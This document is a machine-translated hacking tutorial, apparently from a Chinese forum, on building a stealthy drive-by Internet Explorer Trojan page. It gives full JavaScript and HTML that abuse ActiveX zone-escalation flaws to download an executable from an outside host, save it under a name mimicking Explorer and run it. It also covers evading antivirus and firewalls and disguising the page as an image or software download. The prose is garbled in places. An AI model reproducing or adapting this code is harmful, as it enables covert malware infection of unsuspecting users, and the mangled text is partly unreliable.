You can also when hackers create the perfect IE the page Trojan-vulnerability warning-the black bar safety net

If you want to create the perfect IE web Trojan, first of all have to give our perfect to develop a standard, I personally think that a perfect ＩＥ web Trojans should have at least the following four characteristics:

A: you can hide from antivirus software and the hunted; the

Two: you can avoid the network firewall Alarm;

Three: can be applied to most of the Windows operating system mainly including Windows 9 8, Windows Me, Windows 2 0 0 0, Windows XP, Windows 2 0 0 3 In most IE versions, mainly including IE5. 0 and IE5. 5, and IE6. 0, the best able to bring down the SP patch;

Four: make the viewer not easy to find the IE changes, which can go unnoticed, which can be long-term not to be found.

Note the above Four Points just refers to the page itself, but does not include your Trojans, that is to say our web page Trojan’s is responsible for the operation specified by the Trojans, as for your Trojan horse program is good or bad only you get to choose! Don’t look for me to, I will not write Oh!）

To meet the above Four Points I want to make your horse more youthful for longer, run more like faster…

Read the above points you are not echocardiography? Don’t worry, we’ll regaling the various existing ＩＥ web Trojan insufficient!

First: use old MIME vulnerability ＩＥ web Trojan

This Trojan is now also in popular, but because the vulnerability is too old and the application of ＩＥ version is less, at a time when the impact is too large, the patch pretty much everything on it, so this Trojan is the success rate of planting is relatively low.

Second: use com. ms. activeX. ActiveXComponent vulnerability, combined with ＷＳＨ and ＦＳＯ controls ＩＥ web Trojan

Although the com. ms. activeX. ActiveXComponent vulnerability is widely present in most ＩＥ version, is one of the better vulnerability, the use value is very high, but because it combines the popular virus called ＷＳＨ and ＦＳＯ control so that it it can avoid network firewall Alarm, may be able to escape the antivirus of the hunt, such as the Norton one.

Third: the use of OBJECT type of object to confirm the vulnerability, Ｏｂｊｅｃｔ Ｄａｔａ Ｒｅｍｏｔｅ and binding ＷＳＨ and ＦＳＯ controls ＩＥ page Trojan is a typical representative of the moving shark web Trojan generator

This kind of Trojans of the biggest advantages is the adaptation of the ＩＥ version more, and the vulnerability is relatively new, but has the following disadvantages:

１、because this vulnerability you want to call Rwanda. exe to access the network to download a Trojan program, it will cause the firewall Alarm, such as days network firewall; and

２、if this ＩＥ web Trojans took advantage of a ＷＳＨ and ＦＳＯ controls, the same inescapable virus of the hunt, such as Norton, while moving shark web Trojan and precisely using the ＷＳＨ and ＦＳＯ controls, sigh tone… Alas!.. it?

３、then there is this vulnerability requires the web server to support dynamic web pages such as ＡＳＰ, the ＪＳＰ, the ＣＧＩ, etc., which affect its play, after all now the free stable dynamic web space are few and far between; and although this vulnerability can also be the use of the mail ＭＩＭＥ form to use, but after testing found that the ＩＥ６． ０ does not work.

See the above analysis you are not with this feeling: one thousand army easy to get, a will difficult beg, the horse hordes, and do nothing the Maxima is hard to find it! Don’t worry, let me bring this all together to create my mind of the perfect ＩＥ web page Trojan.

The first thing to hide from anti-virus software to kill, we cannot use ＷＳＨ and ＦＳＯ control, because as long as the use of the ＷＳＨ and ＦＳＯ controls on a certain inescapable“Norton”the hunted, which can be called us the how good is it?! Don’t worry, after my hard work that really I am also in the research ＡＳＰ Trojan stumbled upon the inspiration finally I have found a Can with the controls, that is the shell. application, and it is but after a safety certification, you can in“my computer”in the domain of web pages unimpeded execution, than ＷＳＨ and ＦＳＯ easier to give execute permissions using cross-domain vulnerability can be, consider the following javascript code:

<SCRIPT LANGUAGE=“javascript” type=“text/javascript”>
var shell=new ActiveXObject(“shell. application”);
shell. namespace("c:\\Windows\"). items(). item(“Notepad.exe”). invokeverb();
</SCRIPT>

Save it as test. htm after the open to see whether to automatically open a Notepad program, but not as ＷＳＨ and ＦＳＯ appear as whether to allow run prompt box, not a bit of interest? Now we can run all of the known path of the program, but we require to run our own Trojan program, it is also required to put our Trojan program is downloaded to the viewer’s computer and find out its location. We one by one to solve:

１、download the Trojan program to the viewer’s computer.

This can have many solutions, such as I previously mentioned ＷＩＮＤＯＷＳ Help File Access Protocol to download an arbitrary file vulnerability, its:, but this time we don’t have it, then teach everyone the better of the two download methods:

Example A: using the SCRIPT tag, the code is as follows:

<SCRIPT LANGUAGE=“icyfoxlovelace” src=“http://www.godog.y365.com/wodemuma/icyfox.bat”></SCRIPT>

Note here the LANGUAGE properties may be in addition to javascript, VBScript, JScript, other than the string,also can be characters, as the src attribute of course is your Trojan program the address! Because the now free space for security reasons, most do not allow uploading exe files, we can work around what the extension exe to bat or pif, scr, com, the same can be run.

Example two: using a LINK tag, the code is as follows:

<LINK href=“http://www.godog.y365.com/wodemuma/icyfox.bat” rel=stylesheet type=text/css>

The code placed in the tag<HEAD></HEAD>middle of the href attribute value is a Trojan program address.

The two above are to my knowledge the best two download the Trojan program, which after downloading the program are saved in the ＩＥ temporary directory Temporary Internet Files directory under the subdirectory.

２、find out what has been downloaded to the viewer’s brain in the Trojan path

We can use the shell. application controls some of the properties and methods, and combination of js error handling try{}catch(e){}finally{}statement,a recursive call to find the Trojan horse the path to the program, The code is as follows:

function icyfoxlovelace(){
//Get ＷＩＮＤＯＷＳ system directory and the system tray
url=document. location. href;
xtmu=url. substring(6,url. indexOf('\',9)+1);
xtp=url. substr(6,3);

var shell=new ActiveXObject(“shell. application”);
var runbz=1;

//Set here the Trojans the size, in bytes, of the
//Please put 1 9 8 2 0 1 to your Trojan program the actual size of the
var exeSize=1 9 8 2 0 1;

//Set the Trojans name and extension(exe,com,bat,pif,scr), is used to determine whether the download of the Trojan
//Please put the following two lines in the icyfox to you the Trojan name, bat to your Trojan program the extension
var a=/icyfox\[\d*\]\. bat/gi;
a. compile(“icyfox\\[\\d*\\]\\. bat”,“gi”);

var b=/[A-Za-z]:\/gi;
b. compile("[A-Za-z]:\\\",“gi”);//regular expression for judging whether the disc root directory

//The following code to find and run the Trojan program
wjj(xtmu+"Temporary Internet Files\");//the Content. IE5\\
if(runbz)wjj(xtp+"Documents and Settings\");
if(runbz)yp();

//In all the hard disk partition find and run the Trojan program
function yp(){
try{
var c=new Enumerator(shell. namespace("c:\"). ParentFolder. Items());
for (;! c. atEnd();c. moveNext()){
if(runbz){if(b. test(c. item(). path))wjj(c. item(). path);}
else break;
}
}catch(e){}
}

//Use recursion in the specified directory(including subdirectories)find and run the Trojan program
function wjj(b){
try{
var c=new Enumerator(shell. namespace(b). Items());
for (;! c. atEnd();c. moveNext()){
if(runbz&&c. item(). Size==exeSize&&amp; a. test(c. item(). path)){
var f=c. item(). path;
var v=f. lastIndexOf('\')+1;
try{
shell. namespace(f. substring(0,v)). items(). item(f. substr(v)). invokeverb();//run the Trojan program
runbz=0;
break;
}catch(e){}
}
if(! c. item(). Size)wjj(c. item(). path+"\");//if it is a subdirectory of the recursive call
}
}catch(e){}
}

}

icyfoxlovelace();

请 把 以上 代码 保存 为 icyfox.js the.

Next we’re going to use a little cross-domain execution vulnerability, to get the“My Computer”the domain of the web page permissions, you before is not like me to feel this vulnerability only used for cross-site script attack, get the COOKIELike the stuff? This time it can finally show his face! The code is as follows:

<HTML>
<HEAD>
<META http-equiv=Content-Type content=“text/html; charset=gb2312”>
<TITLE>ice Fox prodigal networking laboratory perfect ＩＥ web Trojan</TITLE>
</HEAD>
<BODY oncontextmenu=“return false” onselectstart=“return false” scroll=“no” topmargin=“0” leftmargin=“0”>
<SCRIPT LANGUAGE=“icyfoxlovelace” src=“http://www.godog.y365.com/wodemuma/icyfox.bat”></SCRIPT>
<SCRIPT LANGUAGE=“javascript”>
//Here setting above icyfox. js file with the network address
//Please put the http://www. godog. y365. com/wodemuma/icyfox. js to your icyfox. the js file is actually transmitted address
jsurl=“http://www.godog.y365.com/wodemuma/icyfox.js”. replace(///g,‘//’);
WIE=navigator. appVersion;
if(WIE. indexOf(“MSIE 5.0”)>-1){
/IE 5.0 using the iframe tag,the src attribute is set to icyfox://will make the tag have a“My Computer”the domain of rights,the reason is because icyfox://is does not exist in the Protocol, 所以会ＩＥ会利用res://协议打开SHDOCLC.DLL中的语法错误页syntax.htm and SHDOCLC. DLL also located in the system directory, as in icyfox. js get ＷＩＮＤＯＷＳ system directory and the system disk to provide data;/
document. write(“<iframe style=‘display:none;’ name=‘icyfoxlovelace’ src=‘icyfox://’></iframe>”);
setTimeout(“muma0()”,1 0 0 0);
}
else {
/IE5. 5, and IE6. 0 then use the _search vulnerability, the opening of the address is set to icyfox://, so that the _search search box with“my computer”the domain of rights, because in IE6. 0 can not be used above the iframe vulnerability, IE5. 5 should be used, I did not test. This result will open a search bar,a little regret!/
window. open(“icyfox://”,“_search”);
setTimeout(“muma1()”,1 0 0 0);
}

//The use of the following file:javascript:Protocol vulnerability in the Has Been is I of computer”domain permissions“icyfox://”to insert icyfox. js script and run
function muma0(){
window. open(“file:javascript:document. all. tags(‘SCRIPT’)[0]. src='”+jsurl+“';eval();”,“icyfoxlovelace”);
}

function muma1(){
window. open(“file:javascript:document. all. tags(‘SCRIPT’)[0]. src='”+jsurl+“';eval();”,“_search”);}
</SCRIPT>
</BODY>
<NOSCRIPT><iframe style=“display:none;” src=‘.’& gt;</iframe></NOSCRIPT>
</HTML>

把 上面 的 代码 保存 为 icyfox.htm,if you want you can put the extension to jpg and added a fine picture of the background to make a picture of the Trojans, even you can be changed to exe, to impersonate a good program of Download address, and in the pages of the<HEAD></HEAD>added a tag<meta http-equiv=“refresh” content=“5;url=‘http://www.godog.y365.com/winrar.exe’”>to the timing of the transfer to another real program download address, so as to better deceive others.

See the above stuff is not to make you have to go immediately to the experimental impulse, don’t worry, if you think win98 is not necessary to control words, there are better Trojan horse waiting for you, don’t know if you’ve used win2000 and winxp system, The default installation of ADODB. Stream and Microsoft. The XMLHTTP control? But they are and shell. application control is through the security certification, can be in“my computer”in the domain of web pages in the unimpeded implementation of the good stuff! Consider the following code:

function icyfox(){
//Set the download upon save in the system directory under the Trojan name I provided is not much like the Explorer. exe? Oh
var name=“Explroer.exe”;
//Set you want to download the Trojan program address here you can put the extension any change, not even the extension is also possible)
//May be better of hiding a free home page space to upload limit
var url=“http://www.godog.y365.com/wodemuma/icyfox.bat”;
try{
var folder=document. location. href;
folder=folder. substring(6,folder. indexOf(‘\',9)+1)+name;
var xml=new ActiveXObject(“Microsoft. XMLHTTP”);
xml. open(“GET”,url,false);
xml. send();
if(xml. status==2 0 0){
var ado=new ActiveXObject(“ADODB. Stream”);
ado. Type=1;
ado. Open();
ado. write(xml. responseBody);
ado. SaveToFile(folder,2);
ado. Close();
ado=null;
}
xml=null;
document. body. insertAdjacentHTML(‘AfterBegin’,’<OBJECT style=“display:none;” TYPE=“application/x-oleobject” CODEBASE=“‘+folder+’”></OBJECT>');
}
catch(e){}

}

icyfox();

Put the above code saved as icyfox. js replace the above save the icyfox. js file the same with the above icyfox. htm to inject into“my computer”domain, and Oh you steal this music!

Finally, also please play the following DIY skills to put the above two codes into one, I believe a stage of the most perfect ＩＥ page Trojan will be in your hands was born! Is not mysteriously it?

The prompt code is as follows:
try{new ActiveXObject(“ADODB. Stream”);icyfox();}catch(e){icyfoxlovelace();}

Note: anyone shall not use this article describes the content to do illegal things.